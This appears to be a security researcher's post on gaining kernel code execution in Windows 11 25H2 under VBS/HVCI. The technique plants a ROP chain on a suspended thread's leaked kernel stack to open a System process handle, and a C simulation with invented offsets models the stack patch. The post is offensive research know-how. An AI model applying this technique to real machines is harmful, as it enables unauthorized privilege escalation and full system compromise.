Control Flow [Code Execution] in Windows 11 25H2 with VBS/HVCI

Arbitrary code execution achieved in Windows 11 25H2 with VBS/HVCI present, via an arbitrary read/write data attack that abuses suspended threads.

This builds on the data-only attack I shared last week, which achieved a token swap to SYSTEM with VBS/HVCI present on the target. Thinking about it afterwards left me with a bittersweet feeling: code execution is always the end game, so I started researching ways of getting "arbitrary code execution" (note the quotes; that part is important, because with VBS/HVCI present we cannot introduce new executable kernel pages, so we are still confined to reusing existing code in VTL0, in kernel land). I ended up finding a project that used suspended threads to partially achieve this, but it was only a proof of concept (credit to Dmytro Oleksiuk, aka Cr4sh). I have extended his work and added full chain support to execute the token swap. Voila!

More on this to come, as I'm researching a novel technique I discovered while doing this project that even bypasses kCET! The technique I'm showing here will not work if both kCET (kernel shadow stacks) and kCFG (Kernel Control Flow Guard) are present: a shadow stack would flag the overwritten return address at the moment the thread resumes. You should still worry about it, though, as at the moment kCET is off by default and can only be turned on if your CPU supports it.

How does it work? Since I already explained the data-only attack, I will focus only on the suspended-thread technique:
- Create a user thread in the suspended state and leak its KTHREAD and KernelStack.
- Resume the thread: when KiApcInterrupt returns, it returns into the ROP chain.
- Find the saved return address on the leaked kernel stack by offset; that slot is where the chain is written.
- ZwOpenProcess creates a kernel handle to PID 4 (System) and writes it into the kernel handle table.
- ZwTerminateThread closes the thread.
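As an added illustration (not code from this page or from Cr4sh's project), the following C simulation models the stack-patching step of the procedure above: an arbitrary read/write primitive over a buffer that stands in for the leaked kernel stack, a scan that locates the saved return address slot, and a bounds-checked write of the chain that will be consumed when the thread is resumed. Every address, RVA and offset (SIM_KSTACK_VA, SIM_NTOS_BASE, SIM_RVA_*, the 0x1d8 slot) is a made-up constant, the gadgets that would set up ZwOpenProcess's arguments are not modeled, and identifying the slot by matching its value against a known ntoskrnl address is this example's assumption; the page gives no real offsets and none are supplied here.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Simulation only: the "kernel stack" is a byte array and every constant
 * below is invented for this example. Real values come from the leaked
 * KTHREAD/KernelStack and the loaded ntoskrnl image, which this page does
 * not provide. */
#define SIM_STACK_BYTES   0x400                 /* simulated kernel stack size */
#define SIM_KSTACK_VA     0xffffa00088800000ULL /* hypothetical KTHREAD.KernelStack */
#define SIM_NTOS_BASE     0xfffff80012340000ULL /* hypothetical ntoskrnl base */

/* Hypothetical image-relative values, NOT real ntoskrnl offsets. */
#define SIM_RVA_APC_RET           0x1a2b30ULL /* return address KiApcInterrupt's ret consumes */
#define SIM_RVA_GADGET_1          0x0c1d40ULL /* first gadget of the chain */
#define SIM_RVA_ZWOPENPROCESS     0x3e4f50ULL
#define SIM_RVA_ZWTERMINATETHREAD 0x5a6b70ULL

/* Simulated kernel memory backing SIM_KSTACK_VA. */
static uint8_t sim_kstack[SIM_STACK_BYTES];

/* Arbitrary read/write primitive, as the data attack would provide it.
 * Here it is bounds-checked against the simulated stack and returns 0 on
 * any access outside it, so a bad address cannot silently corrupt memory. */
static int sim_read64(uint64_t va, uint64_t *out) {
    if (va < SIM_KSTACK_VA || va + 8 > SIM_KSTACK_VA + SIM_STACK_BYTES) return 0;
    memcpy(out, sim_kstack + (va - SIM_KSTACK_VA), 8);
    return 1;
}
static int sim_write64(uint64_t va, uint64_t val) {
    if (va < SIM_KSTACK_VA || va + 8 > SIM_KSTACK_VA + SIM_STACK_BYTES) return 0;
    memcpy(sim_kstack + (va - SIM_KSTACK_VA), &val, 8);
    return 1;
}

/* "Find the return by offset": walk the suspended thread's kernel stack
 * qword by qword and return the VA of the slot holding the expected saved
 * return address (0 if absent). Verifying the value instead of trusting a
 * fixed offset alone avoids planting the chain over the wrong frame. */
static uint64_t find_apc_return_slot(uint64_t stack_va, size_t stack_bytes,
                                     uint64_t ntos_base) {
    uint64_t want = ntos_base + SIM_RVA_APC_RET;
    for (size_t off = 0; off + 8 <= stack_bytes; off += 8) {
        uint64_t v;
        if (!sim_read64(stack_va + off, &v)) return 0;
        if (v == want) return stack_va + off;
    }
    return 0;
}

/* Overwrite the saved return address and the slots above it with the chain,
 * so that when the thread resumes and KiApcInterrupt executes its ret, rsp
 * walks the chain. The whole range is checked before the first write so a
 * chain that does not fit leaves the stack untouched. Returns qwords
 * written, or 0 on failure. */
static size_t plant_chain(uint64_t slot_va, const uint64_t *chain, size_t n) {
    uint64_t probe;
    if (n == 0 || !sim_read64(slot_va + 8 * (n - 1), &probe)) return 0;
    for (size_t i = 0; i < n; i++)
        if (!sim_write64(slot_va + 8 * i, chain[i])) return 0;
    return n;
}

/* End-to-end run over a constructed stack image. Writes the slot's offset
 * from KernelStack to *out_slot_off and returns 1 on success. */
static int simulate_resume_attack(uint64_t *out_slot_off) {
    /* Constructed contents: filler frames plus, at an arbitrary spot, the
     * saved return address that the resumed thread's ret will pop. */
    memset(sim_kstack, 0x41, sizeof sim_kstack);
    sim_write64(SIM_KSTACK_VA + 0x1d8, SIM_NTOS_BASE + SIM_RVA_APC_RET);

    uint64_t slot = find_apc_return_slot(SIM_KSTACK_VA, SIM_STACK_BYTES, SIM_NTOS_BASE);
    if (!slot) return 0;

    /* Chain shape from the page: gadget -> ZwOpenProcess(PID 4) -> ZwTerminateThread.
     * Argument-setting gadgets between these are omitted (none are given). */
    uint64_t chain[] = {
        SIM_NTOS_BASE + SIM_RVA_GADGET_1,
        SIM_NTOS_BASE + SIM_RVA_ZWOPENPROCESS,
        SIM_NTOS_BASE + SIM_RVA_ZWTERMINATETHREAD,
    };
    if (plant_chain(slot, chain, 3) != 3) return 0;
    *out_slot_off = slot - SIM_KSTACK_VA;
    return 1;
}

int main(void) {
    uint64_t off = 0;
    if (!simulate_resume_attack(&off)) { puts("return slot not found"); return 1; }
    printf("chain planted at KernelStack+0x%llx\n", (unsigned long long)off);
    return 0;
}
```

On a real target, sim_read64 and sim_write64 would be replaced by the data attack's primitive and the chain would need the register-setting gadgets for ZwOpenProcess's arguments. The verify-before-write habit matters more in the kernel than it does here: patching the wrong slot on a live kernel stack is a bugcheck, not a failed assertion.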
